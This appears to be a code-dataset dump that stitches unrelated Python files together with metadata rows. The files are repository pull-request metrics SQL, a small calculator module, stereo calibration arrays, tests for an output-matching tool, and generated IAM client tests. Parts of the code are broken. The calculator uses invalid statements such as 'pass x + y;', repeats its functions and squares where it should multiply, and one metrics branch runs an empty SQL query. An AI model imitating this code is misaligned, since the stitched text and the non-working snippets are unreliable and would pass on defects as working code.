'end_date': end_date})
results['duration'] = results['duration'].astype(str)
return results
@annotate(tag='pull-request-acceptance-rate')
def pull_request_acceptance_rate(self, repo_group_id, repo_id=None, begin_date=None, end_date=None, group_by='week'):
"""
Timeseries of pull request acceptance rate (expressed as the ratio of pull requests merged on a date to the count of pull requests opened on a date)
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:return: DataFrame with ratio/day
"""
if not begin_date:
begin_date = '1970-1-1 00:00:01'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not repo_id:
prAccRateSQL = s.sql.text("""
SELECT DATE(date_created) AS "date", CAST(num_approved AS DECIMAL)/CAST(num_open AS DECIMAL) AS "rate"
FROM
(
SELECT count(issue_events.issue_id) AS num_approved,
date_trunc(:group_by,issue_events.created_at) AS accepted_on
FROM issue_events JOIN issues ON issues.issue_id = issue_events.issue_id
JOIN repo ON issues.repo_id = repo.repo_id
WHERE action = 'merged'
AND issues.pull_request IS NOT NULL
AND repo_group_id = :repo_group_id
AND issue_events.created_at BETWEEN :begin_date AND :end_date
GROUP BY accepted_on
ORDER BY accepted_on
) accepted
JOIN
(
SELECT count(issue_events.issue_id) AS num_open,
date_trunc(:group_by,issue_events.created_at) AS date_created
FROM issue_events JOIN issues ON issues.issue_id = issue_events.issue_id
JOIN repo ON issues.repo_id = repo.repo_id
WHERE action = 'ready_for_review'
AND issues.pull_request IS NOT NULL
AND repo_group_id = :repo_group_id
AND issue_events.created_at BETWEEN :begin_date AND :end_date
GROUP BY date_created
ORDER BY date_created
) opened
ON opened.date_created = accepted.accepted_on
""")
results = pd.read_sql(prAccRateSQL, self.database, params={'repo_group_id': repo_group_id, 'group_by': group_by,
'begin_date': begin_date, 'end_date': end_date})
return results
else:
prAccRateSQL = s.sql.text("""
SELECT DATE(date_created) AS "date", CAST(num_approved AS DECIMAL)/CAST(num_open AS DECIMAL) AS "rate"
FROM
(
SELECT count(issue_events.issue_id) AS num_approved,
date_trunc(:group_by,issue_events.created_at) AS accepted_on
FROM issue_events JOIN issues ON issues.issue_id = issue_events.issue_id
WHERE action = 'merged'
AND issues.pull_request IS NOT NULL
AND repo_id = :repo_id
AND issue_events.created_at BETWEEN :begin_date AND :end_date
GROUP BY accepted_on
ORDER BY accepted_on
) accepted
JOIN
(
SELECT count(issue_events.issue_id) AS num_open,
date_trunc(:group_by,issue_events.created_at) AS date_created
FROM issue_events JOIN issues ON issues.issue_id = issue_events.issue_id
WHERE action = 'ready_for_review'
AND issues.pull_request IS NOT NULL
AND repo_id = :repo_id
AND issue_events.created_at BETWEEN :begin_date AND :end_date
GROUP BY date_created
ORDER BY date_created
) opened
ON opened.date_created = accepted.accepted_on
""")
results = pd.read_sql(prAccRateSQL, self.database, params={'repo_id': repo_id, 'group_by': group_by,
'begin_date': begin_date, 'end_date': end_date})
return results
@annotate(tag='pull-request-merged-status-counts')
def pull_request_merged_status_counts(self, repo_group_id, repo_id=None, begin_date='1970-1-1 00:00:01', end_date=None, group_by='week'):
"""
_____
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param begin_date: pull requests opened after this date
:____
:
:return: ____
"""
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
unit_options = ['year', 'month', 'week', 'day']
time_group_bys = []
for time_unit in unit_options.copy():
if group_by not in unit_options:
continue
time_group_bys.append('closed_{}'.format(time_unit))
del unit_options[0]
if not repo_id:
pr_all_sql = s.sql.text("""
""")
else:
pr_all_sql = s.sql.text("""
SELECT
pull_request_id as pull_request_count,
CASE WHEN pr_merged_at IS NULL THEN 'Rejected' ELSE 'Merged' end as merged_status,
date_part( 'year', pr_closed_at :: DATE ) AS closed_year,
date_part( 'month', pr_closed_at :: DATE ) AS closed_month,
date_part( 'week', pr_closed_at :: DATE ) AS closed_week,
date_part( 'day', pr_closed_at :: DATE ) AS closed_day
from pull_requests
where repo_id = :repo_id
AND pr_created_at::date >= :begin_date ::date
AND pr_closed_at::date <= :end_date ::date
""")
pr_all = pd.read_sql(pr_all_sql, self.database, params={'repo_group_id': repo_group_id,
'repo_id': repo_id, 'begin_date': begin_date, 'end_date': end_date})
pr_counts = pr_all.groupby(['merged_status'] + time_group_bys).count().reset_index()[time_group_bys + ['merged_status', 'pull_request_count']]
return pr_counts
def create_pull_request_metrics(metrics):
add_metrics(metrics, __name__)
| 47.313278 | 175 | 0.599474 | 3,033 | 22,805 | 4.221563 | 0.057699 | 0.056232 | 0.046392 | 0.044986 | 0.881053 | 0.856061 | 0.832787 | 0.820369 | 0.817167 | 0.807638 | 0 | 0.009545 | 0.315501 | 22,805 | 481 | 176 | 47.411642 | 0.810698 | 0.139399 | 0 | 0.760108 | 0 | 0.016173 | 0.635917 | 0.125911 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024259 | false | 0 | 0.010782 | 0 | 0.070081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fbbf414cb06739ab19e98cccca9bee549db8101f | 280 | py | Python | cal.py | mauryaSFD/TESTPY | 38e81e3140ea2707d0941653f1d13919f0b59e1e | [
"MIT"
] | null | null | null | cal.py | mauryaSFD/TESTPY | 38e81e3140ea2707d0941653f1d13919f0b59e1e | [
"MIT"
] | null | null | null | cal.py | mauryaSFD/TESTPY | 38e81e3140ea2707d0941653f1d13919f0b59e1e | [
"MIT"
] | null | null | null | def add(x,y):
pass x + y;
def subtract(x,y):
pass x - y;
def multiply(x,y):
pass x * y;
def divide(x,y):
return x / y ;
def add(x,y):
pass x + y;
def subtract(x,y):
pass x - y;
def multiply(x,y):
pass x ** y;
def divide(x,y):
return x / y ;
| 11.666667 | 18 | 0.507143 | 56 | 280 | 2.535714 | 0.160714 | 0.225352 | 0.246479 | 0.295775 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0.317857 | 280 | 23 | 19 | 12.173913 | 0.743456 | 0 | 0 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.375 | 0 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 12 |
fbd699dd02c28efda597a36090e23001ba51de76 | 614 | py | Python | src/stereo_cal.py | jwalthour/calibrationfinder | bc7853ea5553a73442f486c08a62bbb3aa1a1d86 | [
"Apache-2.0"
] | null | null | null | src/stereo_cal.py | jwalthour/calibrationfinder | bc7853ea5553a73442f486c08a62bbb3aa1a1d86 | [
"Apache-2.0"
] | null | null | null | src/stereo_cal.py | jwalthour/calibrationfinder | bc7853ea5553a73442f486c08a62bbb3aa1a1d86 | [
"Apache-2.0"
] | null | null | null | from numpy import array
stereo_cal = {'minError': 7.020103378301475, 'leftProjMat': array([[ 1.07157998e+03, 0.00000000e+00, -2.38154042e+02,
0.00000000e+00],
[ 0.00000000e+00, 1.07157998e+03, 2.75471520e+02,
0.00000000e+00],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00,
0.00000000e+00]]), 'rightProjMat': array([[ 1.07157998e+03, 0.00000000e+00, -2.38154042e+02,
-1.03190287e+06],
[ 0.00000000e+00, 1.07157998e+03, 2.75471520e+02,
0.00000000e+00],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00,
0.00000000e+00]])}
| 47.230769 | 118 | 0.610749 | 85 | 614 | 4.4 | 0.270588 | 0.441176 | 0.417112 | 0.393048 | 0.764706 | 0.764706 | 0.764706 | 0.73262 | 0.73262 | 0.73262 | 0 | 0.57971 | 0.213355 | 614 | 12 | 119 | 51.166667 | 0.194617 | 0 | 0 | 0.583333 | 0 | 0 | 0.050489 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
fbdb6314364f951c7e1a0fe984fee9861beda575 | 8,862 | py | Python | systemtests/common/test_TestExecutionMatchers.py | chyla/OutputMatchTestingTool | 186e7a86d6eecb83e13fb021626e1944a26abbd3 | [
"BSD-3-Clause"
] | 5 | 2020-01-26T22:56:16.000Z | 2022-01-23T22:32:18.000Z | systemtests/common/test_TestExecutionMatchers.py | chyla/OutputMatchTestingTool | 186e7a86d6eecb83e13fb021626e1944a26abbd3 | [
"BSD-3-Clause"
] | null | null | null | systemtests/common/test_TestExecutionMatchers.py | chyla/OutputMatchTestingTool | 186e7a86d6eecb83e13fb021626e1944a26abbd3 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2019-2022, Adam Chyła <adam@chyla.org>.
# All rights reserved.
#
# Distributed under the terms of the BSD 3-Clause License.
from . import TestExecutionMatchers
import unittest
import unittest.mock
first_test_name = "cat-will-exit-with-zero.omtt"
second_test_name = "cat-will_match_part_of_output.omtt"
PASS = "PASS"
FAIL = "FAIL"
def create_omtt_result(first_test_result, second_test_result):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
Verdict: {first_test_result}
====================
Running test (2/2): examples/{second_test_name}
Verdict: {second_test_result}
"""
return result
class TestsWereExecutedInOrderTestSuite(unittest.TestCase):
def test_does_nothing_when_order_match(self):
result = create_omtt_result(PASS, PASS)
TestExecutionMatchers.tests_were_executed_in_order(
result, [first_test_name, second_test_name]
)
def test_raises_exception_when_order_is_wrong_on_first_position(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.tests_were_executed_in_order(
result, [first_test_name, first_test_name]
)
self.assertEqual(
f"Wrong order, expected: '{first_test_name}'; got line with: 'Running test (2/2): examples/{second_test_name}'",
str(cm.exception),
)
def test_raises_exception_when_order_is_wrong_on_later_position(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.tests_were_executed_in_order(
result, [second_test_name, first_test_name]
)
self.assertEqual(
f"Wrong order, expected: '{second_test_name}'; got line with: 'Running test (1/2): examples/{first_test_name}'",
str(cm.exception),
)
def test_raises_exception_when_expected_order_list_is_longer_than_output(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.tests_were_executed_in_order(
result, [first_test_name, second_test_name, second_test_name]
)
self.assertIn("Can't check order, unequal lengths.", str(cm.exception))
def test_raises_exception_when_expected_order_list_is_shorter_than_output(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.tests_were_executed_in_order(
result, [first_test_name]
)
self.assertIn("Can't check order, unequal lengths.", str(cm.exception))
class TestsWasExecutedWithSpecifiedOrder(unittest.TestCase):
def test_does_nothing_when_number_match(self):
result = create_omtt_result(PASS, PASS)
TestExecutionMatchers.test_was_executed_with_specified_order(
result, number=2, of=2, test_file_name=second_test_name
)
def test_raises_exception_when_order_is_wrong(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_specified_order(
result, number=1, of=2, test_file_name=second_test_name
)
self.assertIn(
f"Wrong (or missing) order (1/2) in line: 'Running test (2/2): examples/{second_test_name}'",
str(cm.exception),
)
def test_raises_exception_when_line_with_test_not_found(self):
result = create_omtt_result(PASS, PASS)
not_existing_test = "not_existing_test.omtt"
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_specified_order(
result, number=1, of=2, test_file_name=not_existing_test
)
self.assertEqual(
f"Line with test not found: {not_existing_test}", str(cm.exception)
)
class TestWasExecutedWithPassTestSuite(unittest.TestCase):
def test_assert_exception_is_not_thrown_when_test_pass(self):
result = create_omtt_result(PASS, PASS)
TestExecutionMatchers.test_was_executed_with_pass(result, first_test_name)
def test_assert_exception_is_thrown_when_first_test_fail(self):
result = create_omtt_result(FAIL, PASS)
with self.assertRaises(AssertionError):
TestExecutionMatchers.test_was_executed_with_pass(result, first_test_name)
def test_assert_exception_is_thrown_when_second_test_fail(self):
result = create_omtt_result(PASS, FAIL)
with self.assertRaises(AssertionError):
TestExecutionMatchers.test_was_executed_with_pass(result, second_test_name)
def test_exception_is_thrown_when_test_name_is_not_found_in_output(self):
result = create_omtt_result(PASS, PASS)
non_existing_test_name = "some_test.omtt"
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_pass(
result, non_existing_test_name
)
self.assertEqual(f"Test {non_existing_test_name} not found.", str(cm.exception))
def test_exception_is_thrown_when_test_verdict_is_missing(self):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
====================
Running test (2/2): examples/{second_test_name}
Verdict: PASS
"""
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_pass(result, first_test_name)
self.assertEqual(
f"Test verdict (for {first_test_name}) not found.", str(cm.exception)
)
def test_exception_is_thrown_when_test_verdict_is_missing_due_to_cutted_output(
self,
):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
Verdict: PASS
====================
Running test (2/2): examples/{second_test_name}
"""
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_pass(result, second_test_name)
self.assertEqual(
f"Test verdict (for {second_test_name}) not found.", str(cm.exception)
)
class TestWasExecutedWithFailTestSuite(unittest.TestCase):
def test_assert_exception_is_not_thrown_when_test_fail(self):
result = create_omtt_result(FAIL, FAIL)
TestExecutionMatchers.test_was_executed_with_fail(result, first_test_name)
def test_assert_exception_is_thrown_when_first_test_pass(self):
result = create_omtt_result(PASS, FAIL)
with self.assertRaises(AssertionError):
TestExecutionMatchers.test_was_executed_with_fail(result, first_test_name)
def test_assert_exception_is_thrown_when_second_test_pass(self):
result = create_omtt_result(FAIL, PASS)
with self.assertRaises(AssertionError):
TestExecutionMatchers.test_was_executed_with_fail(result, second_test_name)
def test_exception_is_thrown_when_test_name_is_not_found_in_output(self):
result = create_omtt_result(FAIL, FAIL)
non_existing_test_name = "some_test.omtt"
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_fail(
result, non_existing_test_name
)
self.assertEqual(f"Test {non_existing_test_name} not found.", str(cm.exception))
def test_exception_is_thrown_when_test_verdict_is_missing(self):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
====================
Running test (2/2): examples/{second_test_name}
Verdict: FAIL
"""
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_fail(result, first_test_name)
self.assertEqual(
f"Test verdict (for {first_test_name}) not found.", str(cm.exception)
)
def test_exception_is_thrown_when_test_verdict_is_missing_due_to_cutted_output(
self,
):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
Verdict: FAIL
====================
Running test (2/2): examples/{second_test_name}
"""
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_fail(result, second_test_name)
self.assertEqual(
f"Test verdict (for {second_test_name}) not found.", str(cm.exception)
)
| 34.617188 | 124 | 0.690702 | 1,091 | 8,862 | 5.224565 | 0.101742 | 0.071579 | 0.050175 | 0.05614 | 0.880526 | 0.873509 | 0.870351 | 0.840877 | 0.822456 | 0.8 | 0 | 0.006104 | 0.205033 | 8,862 | 255 | 125 | 34.752941 | 0.802981 | 0.014782 | 0 | 0.666667 | 0 | 0.015873 | 0.195393 | 0.057415 | 0 | 0 | 0 | 0 | 0.179894 | 1 | 0.111111 | false | 0.142857 | 0.015873 | 0 | 0.153439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
83a7955119dcaf8cde3653451d9c3069598640f4 | 176,941 | py | Python | google/iam/v1beta/iam-v1beta-py/tests/unit/gapic/iam_v1beta/test_workload_identity_pools.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/iam/v1beta/iam-v1beta-py/tests/unit/gapic/iam_v1beta/test_workload_identity_pools.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/iam/v1beta/iam-v1beta-py/tests/unit/gapic/iam_v1beta/test_workload_identity_pools.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import future
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation_async # type: ignore
from google.api_core import operations_v1
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.iam_v1beta.services.workload_identity_pools import WorkloadIdentityPoolsAsyncClient
from google.iam_v1beta.services.workload_identity_pools import WorkloadIdentityPoolsClient
from google.iam_v1beta.services.workload_identity_pools import pagers
from google.iam_v1beta.services.workload_identity_pools import transports
from google.iam_v1beta.services.workload_identity_pools.transports.base import _GOOGLE_AUTH_VERSION
from google.iam_v1beta.types import workload_identity_pool
from google.iam_v1beta.types import workload_identity_pool as gi_workload_identity_pool
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
import google.auth
# TODO(busunkim): Once google-auth >= 1.25.0 is required transitively
# through google-api-core:
# - Delete the auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(None) is None
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert WorkloadIdentityPoolsClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
WorkloadIdentityPoolsClient,
WorkloadIdentityPoolsAsyncClient,
])
def test_workload_identity_pools_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'iam.googleapis.com:443'
@pytest.mark.parametrize("transport_class,transport_name", [
(transports.WorkloadIdentityPoolsGrpcTransport, "grpc"),
(transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_workload_identity_pools_client_service_account_always_use_jwt(transport_class, transport_name):
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [
WorkloadIdentityPoolsClient,
WorkloadIdentityPoolsAsyncClient,
])
def test_workload_identity_pools_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'iam.googleapis.com:443'
def test_workload_identity_pools_client_get_transport_class():
transport = WorkloadIdentityPoolsClient.get_transport_class()
available_transports = [
transports.WorkloadIdentityPoolsGrpcTransport,
]
assert transport in available_transports
transport = WorkloadIdentityPoolsClient.get_transport_class("grpc")
assert transport == transports.WorkloadIdentityPoolsGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(WorkloadIdentityPoolsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkloadIdentityPoolsClient))
@mock.patch.object(WorkloadIdentityPoolsAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkloadIdentityPoolsAsyncClient))
def test_workload_identity_pools_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(WorkloadIdentityPoolsClient, 'get_transport_class') as gtc:
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials()
)
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(WorkloadIdentityPoolsClient, 'get_transport_class') as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc", "true"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio", "true"),
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc", "false"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(WorkloadIdentityPoolsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkloadIdentityPoolsClient))
@mock.patch.object(WorkloadIdentityPoolsAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkloadIdentityPoolsAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_workload_identity_pools_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
